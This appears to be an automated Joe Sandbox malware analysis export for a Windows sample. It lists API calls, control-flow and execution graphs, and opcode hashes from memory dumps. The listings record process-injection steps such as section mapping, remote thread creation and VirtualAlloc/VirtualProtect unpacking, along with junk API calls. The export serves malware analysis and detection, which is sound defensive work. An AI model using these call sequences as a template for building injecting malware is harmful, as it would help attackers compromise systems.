                                • Opcode Fuzzy Hash: a4b5604c3fad4e3a9f3f792e8fb47035b06f8c3694b385928224ebe720cba1b7
                                • Instruction Fuzzy Hash: EB11A1F660C204FAEB106AA49C61E7A3318AB40754F304137F613790F5957D9A13F66F

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 431 401915-401918 432 4018c6-4018c7 431->432 433 40191a-40194b call 401193 Sleep call 40141f 431->433 434 4018d7 432->434 435 4018ce-4018e3 call 401193 432->435 445 40195a-4019a5 call 401193 433->445 446 40194d-401955 call 401514 433->446 434->435 446->445
                                APIs
                                • Sleep.KERNELBASE(00001388), ref: 00401936
                                  • Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                  • Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                  • Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                Memory Dump Source
                                • Source File: 00000000.00000002.2143568060.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_mGFoU1INUk.jbxd
                                Similarity
                                • API ID: Section$CreateDuplicateObjectSleepView
                                • String ID:
                                • API String ID: 1885482327-0
                                • Opcode ID: 7bb1df720b8f813faa3697c6259eeb6b3a5716e5c382bc39f4698e2c5426f3b5
                                • Instruction ID: d2c64d108ecd7190b789ce3c9d4f03e3911909dfd4099b6475a4add21270c3a3
                                • Opcode Fuzzy Hash: 7bb1df720b8f813faa3697c6259eeb6b3a5716e5c382bc39f4698e2c5426f3b5
                                • Instruction Fuzzy Hash: 6D019EB7208208E6DB006AA5AC51ABA33189B44359F304537F723790F6D57D8612E72F

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 460 4018f1-40194b call 401193 Sleep call 40141f 470 40195a-4019a5 call 401193 460->470 471 40194d-401955 call 401514 460->471 471->470
                                APIs
                                • Sleep.KERNELBASE(00001388), ref: 00401936
                                  • Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                  • Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                  • Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                Memory Dump Source
                                • Source File: 00000000.00000002.2143568060.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_mGFoU1INUk.jbxd
                                Similarity
                                • API ID: Section$CreateDuplicateObjectSleepView
                                • String ID:
                                • API String ID: 1885482327-0
                                • Opcode ID: db3408315eb658ba3491db04f2d46bddbd6b336d8c43cf969156009dde905ade
                                • Instruction ID: b5ca90d31d4069b8fd1e735589466699ca1bb5e14181e618ca72d4e2f39bbf06
                                • Opcode Fuzzy Hash: db3408315eb658ba3491db04f2d46bddbd6b336d8c43cf969156009dde905ade
                                • Instruction Fuzzy Hash: D101D2B6608204EBDB019AF49C62A7A37549F44315F200137FA53790F1D67D8643E72F

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 485 401912-40194b call 401193 Sleep call 40141f 496 40195a-4019a5 call 401193 485->496 497 40194d-401955 call 401514 485->497 497->496
                                APIs
                                • Sleep.KERNELBASE(00001388), ref: 00401936
                                  • Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                  • Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                  • Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                Memory Dump Source
                                • Source File: 00000000.00000002.2143568060.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_mGFoU1INUk.jbxd
                                Similarity
                                • API ID: Section$CreateDuplicateObjectSleepView
                                • String ID:
                                • API String ID: 1885482327-0
                                • Opcode ID: 7e129187160df36b360d42079074bb08fe8934bb284168352239ee73acaefb28
                                • Instruction ID: 0621b20c29367ada74e4c9127c9a5516285bec5e68af8f441e6b7f153e3f788d
                                • Opcode Fuzzy Hash: 7e129187160df36b360d42079074bb08fe8934bb284168352239ee73acaefb28
                                • Instruction Fuzzy Hash: 11017CB560C204EAEB109AA49C61A7A3318AB44354F304537FA27790F5D67D9612E72F
                                APIs
                                • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 02C4A29F
                                Memory Dump Source
                                • Source File: 00000000.00000002.2147151739.0000000002C47000.00000040.00000020.00020000.00000000.sdmp, Offset: 02C47000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2c47000_mGFoU1INUk.jbxd
                                Yara matches
                                Similarity
                                • API ID: AllocVirtual
                                • String ID:
                                • API String ID: 4275171209-0
                                • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                • Instruction ID: 886736dfa0f72b65cc467638cf51833ebde7ab18f40d4974699cdd67b27aeaec
                                • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                • Instruction Fuzzy Hash: 3C113C79A40208EFDB01DF98C995E99BBF5AF08351F158094F9489B362D771EA50EF80
                                APIs
                                • Sleep.KERNELBASE(00001388), ref: 00401936
                                  • Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                  • Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                  • Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                Memory Dump Source
                                • Source File: 00000000.00000002.2143568060.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_mGFoU1INUk.jbxd
                                Similarity
                                • API ID: Section$CreateDuplicateObjectSleepView
                                • String ID:
                                • API String ID: 1885482327-0
                                • Opcode ID: 2f4c2daa00eb47e2555f44135ed694f04ab08e7709eb0f7e86441ab925b63f7c
                                • Instruction ID: ea6e3854d66af35421fcd7571e0742f45a6e64d38424a4e1b6315f5079e28d0a
                                • Opcode Fuzzy Hash: 2f4c2daa00eb47e2555f44135ed694f04ab08e7709eb0f7e86441ab925b63f7c
                                • Instruction Fuzzy Hash: 28F08CB6208204EADB00AEA49C61EBA3318AB44314F304533FB23790F5C67D8612E72F
                                APIs
                                • LocalAlloc.KERNELBASE(00000000,02B18CE4,00415E8B), ref: 004157F8
                                Memory Dump Source
                                • Source File: 00000000.00000002.2143598298.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_40b000_mGFoU1INUk.jbxd
                                Similarity
                                • API ID: AllocLocal
                                • String ID:
                                • API String ID: 3494564517-0
                                • Opcode ID: 74057e30488fa2548e774f69ad24f16fb778dc8554d8f99b62281b18be0c0aab
                                • Instruction ID: 1a08001e757156177e4176ef5c7bf10d863cb70e7c1df62a2ddb33f564a894ee
                                • Opcode Fuzzy Hash: 74057e30488fa2548e774f69ad24f16fb778dc8554d8f99b62281b18be0c0aab
                                • Instruction Fuzzy Hash: 53B092B09822009BE240CBA0A844B513A68B308342F414421F508C6180DA2054208F14
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2147438487.0000000002FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FC0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2fc0000_mGFoU1INUk.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: .$GetProcAddress.$l
                                • API String ID: 0-2784972518
                                • Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                • Instruction ID: 8ff8b4bf2f8a73bf94ee3b62b2d3bd9cbce14d2bfb2d03d8720fd332c02ab9fb
                                • Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                • Instruction Fuzzy Hash: BA3137B690060ADFDB14CF99C980BAEBBF9FB48364F24404ED541A7710DB71EA45CBA4
                                Memory Dump Source
                                • Source File: 00000000.00000002.2143568060.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_mGFoU1INUk.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 5c6c29104785b404ee1587310faf7a58f985fc96c36e4a0f0ab47a9eb8818183
                                • Instruction ID: fe5d022e5c5052bbf0faad43917780fc708419ff1cff70b8a02db4b5679634ad
                                • Opcode Fuzzy Hash: 5c6c29104785b404ee1587310faf7a58f985fc96c36e4a0f0ab47a9eb8818183
                                • Instruction Fuzzy Hash: AC4158A5D1D2834FEB530A3018960A27FBCA96335371842FFC441EA5C7E23C1B07925A
                                Memory Dump Source
                                • Source File: 00000000.00000002.2143568060.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_mGFoU1INUk.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: bd713e8a9ffb35993257ca06bb1ca9cf03b0909bce816e3c168a85f7237ff4a9
                                • Instruction ID: 47d85a717b2f9eb1e037dbaf55b436ab29ce309417f93d286f8d159decdfda18
                                • Opcode Fuzzy Hash: bd713e8a9ffb35993257ca06bb1ca9cf03b0909bce816e3c168a85f7237ff4a9
                                • Instruction Fuzzy Hash: 681101A1D1D2829BDF5B1E2108655767F6C6E7331772800FFD042BA2D2E23D5B02A26F
                                Memory Dump Source
                                • Source File: 00000000.00000002.2143568060.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_mGFoU1INUk.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 8235a342c0a5ccfb7a676b72f8706d5939bc8c2cb4e96ca567b58c971c6cfde2
                                • Instruction ID: 44dbed29d4116881d315b966fbacf1cf40a73d3247e8d5490da27da81908206f
                                • Opcode Fuzzy Hash: 8235a342c0a5ccfb7a676b72f8706d5939bc8c2cb4e96ca567b58c971c6cfde2
                                • Instruction Fuzzy Hash: 091120A1D1C2825BDF9B1E204C645B27F6C6A7332371800FFE402BA2D6E23D1B03925E
                                Memory Dump Source
                                • Source File: 00000000.00000002.2143568060.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_mGFoU1INUk.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: f11a235e0e08faed31d233c350fe522c88a0f226e8326adf6e177ce42ec05621
                                • Instruction ID: 6cc5313a22b02943346cb09be328e63b116041f9455492dba296d6b6c8d47a80
                                • Opcode Fuzzy Hash: f11a235e0e08faed31d233c350fe522c88a0f226e8326adf6e177ce42ec05621
                                • Instruction Fuzzy Hash: 0111E0A1C1D2829BDF5A2E2108648767F6C6A7731772800FFD042FA2D6E23D5B03A15F
                                Memory Dump Source
                                • Source File: 00000000.00000002.2143568060.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_mGFoU1INUk.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 9ec03d413cbbfde9ae04b67bfcc6c031395faee012b42a8efe698a5ecb0e7cee
                                • Instruction ID: 83c2e45a663ff97a83121d71df7fde14c7d1be506299b7fe0adcc4aca9f65d16
                                • Opcode Fuzzy Hash: 9ec03d413cbbfde9ae04b67bfcc6c031395faee012b42a8efe698a5ecb0e7cee
                                • Instruction Fuzzy Hash: 3211CBA1C1D2825BDFAA1E2108544B67F6CAA7771771400FFD402BA2D6E23D5B02929E
                                Memory Dump Source
                                • Source File: 00000000.00000002.2147151739.0000000002C47000.00000040.00000020.00020000.00000000.sdmp, Offset: 02C47000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2c47000_mGFoU1INUk.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                • Instruction ID: 3e8cd0e719afba6806f67d4c44f928eea7c86e3216d77bb88975499482157003
                                • Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                • Instruction Fuzzy Hash: 15118E72340210AFDB44DF55DD90EA773EAEB89324B198065ED04CB311DA75E842CB60
                                Memory Dump Source
                                • Source File: 00000000.00000002.2143568060.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_mGFoU1INUk.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: e274102659cc5964db6623cf4447b3957c7ecae9963d781930d0ebff3212451b
                                • Instruction ID: 18a3bc8234d562e7f0c7d25340e1ec3d72d942eb246f5034c2dedc7c4f371e85
                                • Opcode Fuzzy Hash: e274102659cc5964db6623cf4447b3957c7ecae9963d781930d0ebff3212451b
                                • Instruction Fuzzy Hash: 3611E191D1C2820BDFA62E2048545B67F6C5A7335771840FFD401F62D6F13D1F02825A
                                Memory Dump Source
                                • Source File: 00000000.00000002.2147438487.0000000002FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FC0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2fc0000_mGFoU1INUk.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                • Instruction ID: 62bbbbe301047a0cc95ae73cb333040dad8261c8d9955c9f34ed1e45f27ca6e3
                                • Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                • Instruction Fuzzy Hash: 3A01F772A10601CFDF21CF20C904BAA33E9EB85245F1540ACD60797241EB70A8428B90
                                APIs
                                • BuildCommDCBA.KERNEL32(00000000,?), ref: 00415A21
                                • WritePrivateProfileStringA.KERNEL32(00417384,0041735C,00417330,0041730C), ref: 00415A45
                                • FreeEnvironmentStringsA.KERNEL32(00000000), ref: 00415A4D
                                • GetNumaAvailableMemoryNode.KERNEL32(00000000,00000000), ref: 00415A8D
                                • GetComputerNameW.KERNEL32(?,?), ref: 00415AA1
                                • SetCalendarInfoA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00415AAF
                                • OpenJobObjectA.KERNEL32(00000000,00000000,004173B4), ref: 00415ABE
                                • GetShortPathNameW.KERNEL32(00000000,?,00000000), ref: 00415ACF
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2143598298.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_40b000_mGFoU1INUk.jbxd
                                Similarity
                                • API ID: Name$AvailableBuildCalendarCommComputerEnvironmentFreeInfoMemoryNodeNumaObjectOpenPathPrivateProfileShortStringStringsWrite
                                • String ID: -
                                • API String ID: 113859268-2547889144
                                • Opcode ID: db8dc46efc40b99fabcfa4c7d1f5ac96ecf50084b678cb0d3d0fd53c861d6c22
                                • Instruction ID: 2c7d7bcc96ebfa56bd727007de7ac8ab34d93c8d3fedf15d4148c8bbf7674042
                                • Opcode Fuzzy Hash: db8dc46efc40b99fabcfa4c7d1f5ac96ecf50084b678cb0d3d0fd53c861d6c22
                                • Instruction Fuzzy Hash: 4321F731A84308EAD720DF94DC85BD97B70EF4C752F1181AAFA49AA1C0CAB45AC4CB59
                                APIs
                                • QueryDosDeviceW.KERNEL32(00000000,?,00000000), ref: 00415B44
                                • FreeEnvironmentStringsA.KERNEL32(00000000), ref: 00415B5F
                                • HeapDestroy.KERNEL32(00000000), ref: 00415B7E
                                • GetNumaHighestNodeNumber.KERNEL32(00000000), ref: 00415B86
                                Memory Dump Source
                                • Source File: 00000000.00000002.2143598298.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_40b000_mGFoU1INUk.jbxd
                                Similarity
                                • API ID: DestroyDeviceEnvironmentFreeHeapHighestNodeNumaNumberQueryStrings
                                • String ID:
                                • API String ID: 367530164-0
                                • Opcode ID: 2eaa3619de8731856ba23563b2baea9085cebb685e66d531b2d230375b233c37
                                • Instruction ID: f8d66b9204655c3a429d25ec7d87b798a9bd44671bb4d674f784994b3474509b
                                • Opcode Fuzzy Hash: 2eaa3619de8731856ba23563b2baea9085cebb685e66d531b2d230375b233c37
                                • Instruction Fuzzy Hash: FF012670A82504DBE750EBB4EC85BDA7BA8F70C306F804037F60A97280DE346C54CB9A

                                Execution Graph

                                Execution Coverage:9.6%
                                Dynamic/Decrypted Code Coverage:30.2%
                                Signature Coverage:0%
                                Total number of Nodes:162
                                Total number of Limit Nodes:6
                                execution_graph 3388 402e40 3390 402e37 3388->3390 3391 402edf 3390->3391 3392 4018e6 3390->3392 3393 4018f5 3392->3393 3394 40192e Sleep 3393->3394 3395 401949 3394->3395 3397 40195a 3395->3397 3398 401514 3395->3398 3397->3391 3399 401524 3398->3399 3400 4015c4 NtDuplicateObject 3399->3400 3406 4016e0 3399->3406 3401 4015e1 NtCreateSection 3400->3401 3400->3406 3402 401661 NtCreateSection 3401->3402 3403 401607 NtMapViewOfSection 3401->3403 3405 40168d 3402->3405 3402->3406 3403->3402 3404 40162a NtMapViewOfSection 3403->3404 3404->3402 3407 401648 3404->3407 3405->3406 3408 401697 NtMapViewOfSection 3405->3408 3406->3397 3407->3402 3408->3406 3409 4016be NtMapViewOfSection 3408->3409 3409->3406 3429 415fa0 3432 415ba0 3429->3432 3431 415fa5 3433 415bad 3432->3433 3434 415d90 3433->3434 3435 415c67 InterlockedCompareExchange ReadConsoleA FindAtomW SetConsoleMode SearchPathW 3433->3435 3436 415da0 SetCommState 3434->3436 3440 415db9 3434->3440 3437 415ccd 7 API calls 3435->3437 3436->3434 3438 415d81 3437->3438 3439 415d7a PulseEvent 3437->3439 3438->3434 3439->3438 3441 415e86 3440->3441 3442 415dc6 7 API calls 3440->3442 3453 4157f0 LocalAlloc 3441->3453 3449 415e5a 3442->3449 3446 415e8b LoadLibraryA 3454 415820 GetModuleHandleW GetProcAddress VirtualProtect 3446->3454 3447 415edd 3455 415b10 3447->3455 3449->3441 3450 415ee2 3451 415f19 InterlockedDecrement 3450->3451 3452 415f2f 3450->3452 3451->3450 3452->3431 3453->3446 3454->3447 3456 415b39 QueryDosDeviceW 3455->3456 3457 415b4a 3455->3457 3456->3457 3466 4159b0 3457->3466 3460 415b65 3469 4159f0 3460->3469 3461 415b5d FreeEnvironmentStringsA 3461->3460 3464 415b8c 3464->3450 3465 415b7c HeapDestroy GetNumaHighestNodeNumber 3465->3464 3467 4159c1 FatalAppExitA GetModuleHandleW 3466->3467 3468 4159d3 3466->3468 3467->3468 3468->3460 3468->3461 3470 4159fd 3469->3470 3471 415a29 3470->3471 3472 415a18 BuildCommDCBA 3470->3472 3473 415a31 WritePrivateProfileStringA FreeEnvironmentStringsA 3471->3473 3475 415a53 3471->3475 3472->3475 3473->3475 3474 415ada 3474->3464 3474->3465 3475->3474 3477 415a89 GetNumaAvailableMemoryNode GetComputerNameW SetCalendarInfoA OpenJobObjectA GetShortPathNameW 3475->3477 3478 4159e0 3475->3478 3477->3475 3481 415970 3478->3481 3482 415999 3481->3482 3483 41598c SetEvent 3481->3483 3482->3475 3483->3482 3563 401542 3564 40153b 3563->3564 3565 4015c4 NtDuplicateObject 3564->3565 3567 4016e0 3564->3567 3566 4015e1 NtCreateSection 3565->3566 3565->3567 3568 401661 NtCreateSection 3566->3568 3569 401607 NtMapViewOfSection 3566->3569 3568->3567 3571 40168d 3568->3571 3569->3568 3570 40162a NtMapViewOfSection 3569->3570 3570->3568 3574 401648 3570->3574 3571->3567 3572 401697 NtMapViewOfSection 3571->3572 3572->3567 3573 4016be NtMapViewOfSection 3572->3573 3573->3567 3574->3568 3537 2cc0005 3542 2cc092b GetPEB 3537->3542 3539 2cc0030 3544 2cc003c 3539->3544 3543 2cc0972 3542->3543 3543->3539 3545 2cc0049 3544->3545 3546 2cc0e0f 2 API calls 3545->3546 3547 2cc0223 3546->3547 3548 2cc0d90 GetPEB 3547->3548 3549 2cc0238 VirtualAlloc 3548->3549 3550 2cc0265 3549->3550 3551 2cc02ce VirtualProtect 3550->3551 3553 2cc030b 3551->3553 3552 2cc0439 VirtualFree 3556 2cc04be LoadLibraryA 3552->3556 3553->3552 3555 2cc08c7 3556->3555 3557 2cc0001 3558 2cc0005 3557->3558 3559 2cc092b GetPEB 3558->3559 3560 2cc0030 3559->3560 3561 2cc003c 7 API calls 3560->3561 3562 2cc0038 3561->3562 3410 2cc003c 3411 2cc0049 3410->3411 3423 2cc0e0f SetErrorMode SetErrorMode 3411->3423 3416 2cc0265 3417 2cc02ce VirtualProtect 3416->3417 3419 2cc030b 3417->3419 3418 2cc0439 VirtualFree 3422 2cc04be LoadLibraryA 3418->3422 3419->3418 3421 2cc08c7 3422->3421 3424 2cc0223 3423->3424 3425 2cc0d90 3424->3425 3426 2cc0dad 3425->3426 3427 2cc0dbb GetPEB 3426->3427 3428 2cc0238 VirtualAlloc 3426->3428 3427->3428 3428->3416 3622 402dd0 3624 402ddc 3622->3624 3623 402edf 3624->3623 3625 4018e6 8 API calls 3624->3625 3625->3623 3518 4018f1 3519 4018f6 3518->3519 3520 40192e Sleep 3519->3520 3521 401949 3520->3521 3522 401514 7 API calls 3521->3522 3523 40195a 3521->3523 3522->3523 3484 2d0a262 3487 2d0a26f 3484->3487 3488 2d0a27e 3487->3488 3491 2d0aa0f 3488->3491 3493 2d0aa2a 3491->3493 3492 2d0aa33 CreateToolhelp32Snapshot 3492->3493 3494 2d0aa4f Module32First 3492->3494 3493->3492 3493->3494 3495 2d0aa5e 3494->3495 3497 2d0a26e 3494->3497 3498 2d0a6ce 3495->3498 3499 2d0a6f9 3498->3499 3500 2d0a742 3499->3500 3501 2d0a70a VirtualAlloc 3499->3501 3500->3500 3501->3500 3609 401915 3610 4018c6 3609->3610 3611 40191a 3609->3611 3612 40192e Sleep 3611->3612 3613 401949 3612->3613 3614 401514 7 API calls 3613->3614 3615 40195a 3613->3615 3614->3615 3502 402f97 3503 4030ee 3502->3503 3504 402fc1 3502->3504 3504->3503 3505 40307c RtlCreateUserThread NtTerminateProcess 3504->3505 3505->3503 3599 402d7b 3600 402d38 3599->3600 3600->3599 3601 402dc7 3600->3601 3602 4018e6 8 API calls 3600->3602 3602->3601 3524 4014fe 3525 401506 3524->3525 3526 401531 3524->3526 3527 4015c4 NtDuplicateObject 3526->3527 3533 4016e0 3526->3533 3528 4015e1 NtCreateSection 3527->3528 3527->3533 3529 401661 NtCreateSection 3528->3529 3530 401607 NtMapViewOfSection 3528->3530 3532 40168d 3529->3532 3529->3533 3530->3529 3531 40162a NtMapViewOfSection 3530->3531 3531->3529 3534 401648 3531->3534 3532->3533 3535 401697 NtMapViewOfSection 3532->3535 3534->3529 3535->3533 3536 4016be NtMapViewOfSection 3535->3536 3536->3533

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 0 415ba0-415bc8 2 415bd0-415bd7 0->2 3 415bd9-415bdb 2->3 4 415bdf-415be5 2->4 3->4 5 415be7-415bf1 4->5 6 415bf6-415c00 4->6 5->6 7 415c02-415c0e 6->7 8 415c18-415c1f 6->8 7->8 8->2 9 415c21-415c29 8->9 11 415c30-415c36 9->11 12 415c44-415c4b 11->12 13 415c38-415c3e 11->13 14 415c51-415c58 12->14 15 415c4d 12->15 13->12 14->11 16 415c5a-415c61 14->16 15->14 17 415d90-415d9e 16->17 18 415c67-415d78 InterlockedCompareExchange ReadConsoleA FindAtomW SetConsoleMode SearchPathW SetDefaultCommConfigW MoveFileW GetVersionExW DisconnectNamedPipe ReadConsoleOutputW GetModuleFileNameA LCMapStringA 16->18 19 415da0-415dae SetCommState 17->19 21 415d81-415d8d 18->21 22 415d7a-415d7b PulseEvent 18->22 24 415db0-415db7 19->24 25 415db9-415dc0 19->25 21->17 22->21 24->19 24->25 27 415e86-415e95 call 4157f0 25->27 28 415dc6-415e80 GetConsoleAliasesLengthA GetStringTypeExW BuildCommDCBA GetTimeFormatW GetFileAttributesA GetConsoleAliasExesLengthA GetBinaryType 25->28 33 415e97-415ea8 27->33 34 415ecd-415ed8 LoadLibraryA call 415820 27->34 28->27 35 415eb0-415ec0 33->35 40 415edd-415eee call 415b10 34->40 38 415ec2 35->38 39 415ec8-415ecb 35->39 38->39 39->34 39->35 45 415ef0-415ef7 40->45 46 415f03-415f09 45->46 47 415ef9-415eff 45->47 49 415f10-415f17 46->49 50 415f0b call 415810 46->50 47->46 52 415f26-415f2d 49->52 53 415f19-415f20 InterlockedDecrement 49->53 50->49 52->45 55 415f2f-415f3f 52->55 53->52 57 415f40-415f50 55->57 58 415f52 57->58 59 415f59-415f5c 57->59 58->59 59->57 60 415f5e-415f69 59->60 61 415f70-415f75 60->61 62 415f77-415f7d 61->62 63 415f7f-415f85 61->63 62->63 64 415f87-415f94 62->64 63->61 63->64
                                APIs
                                • InterlockedCompareExchange.KERNEL32(?,00000000,00000000), ref: 00415C72
                                • ReadConsoleA.KERNEL32(00000000,?,00000000,?,00000000), ref: 00415C8B
                                • FindAtomW.KERNEL32(00000000), ref: 00415C92
                                • SetConsoleMode.KERNEL32(00000000,00000000), ref: 00415C9A
                                • SearchPathW.KERNEL32(00000000,00000000,00000000,00000000,?,?), ref: 00415CB2
                                • SetDefaultCommConfigW.KERNEL32(00000000,?,00000000), ref: 00415CD9
                                • MoveFileW.KERNEL32(00000000,00000000), ref: 00415CE1
                                • GetVersionExW.KERNEL32(?), ref: 00415CEE
                                • DisconnectNamedPipe.KERNEL32(?), ref: 00415D01
                                • ReadConsoleOutputW.KERNEL32(00000000,?,?,?,?), ref: 00415D46
                                • GetModuleFileNameA.KERNEL32(00000000,?,00000000), ref: 00415D55
                                • LCMapStringA.KERNEL32(00000000,00000000,004173C0,00000000,?,00000000), ref: 00415D6B
                                • PulseEvent.KERNEL32(00000000), ref: 00415D7B
                                • SetCommState.KERNELBASE(00000000,00000000), ref: 00415DA4
                                • GetConsoleAliasesLengthA.KERNEL32(00000000), ref: 00415DD5
                                • GetStringTypeExW.KERNEL32(00000000,00000000,00000000,00000000,?), ref: 00415DE6
                                • BuildCommDCBA.KERNEL32(00000000,00000000), ref: 00415DEE
                                • GetTimeFormatW.KERNEL32(00000000,00000000,?,004173EC,?,00000000), ref: 00415E2E
                                • GetFileAttributesA.KERNEL32(00000000), ref: 00415E35
                                • GetConsoleAliasExesLengthA.KERNEL32 ref: 00415E3B
                                • GetBinaryType.KERNEL32(0041742C,?), ref: 00415E4D
                                • LoadLibraryA.KERNELBASE(00417438), ref: 00415ED2
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2418488030.000000000040B000.00000020.00000001.01000000.00000006.sdmp, Offset: 0040B000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_40b000_ibjgueh.jbxd
                                Similarity
                                • API ID: Console$CommFile$LengthReadStringType$AliasAliasesAtomAttributesBinaryBuildCompareConfigDefaultDisconnectEventExchangeExesFindFormatInterlockedLibraryLoadModeModuleMoveNameNamedOutputPathPipePulseSearchStateTimeVersion
                                • String ID: k`$}$
                                • API String ID: 2545807588-956986773
                                • Opcode ID: 89f702b1397d06244922e5fd887acc024e0239ca569067a159a5991e14586c5a
                                • Instruction ID: af97c55d7550fca7481f4020956f7819bfbd285186e11878fc050d44ae633f67
                                • Opcode Fuzzy Hash: 89f702b1397d06244922e5fd887acc024e0239ca569067a159a5991e14586c5a
                                • Instruction Fuzzy Hash: 9CA1E371802A24DBC720DB65EC48ADB7F79FF89351F41406AF50AA7150DB385A81CFAD

                                Control-flow Graph

                                • Executed
                                • Not Executed
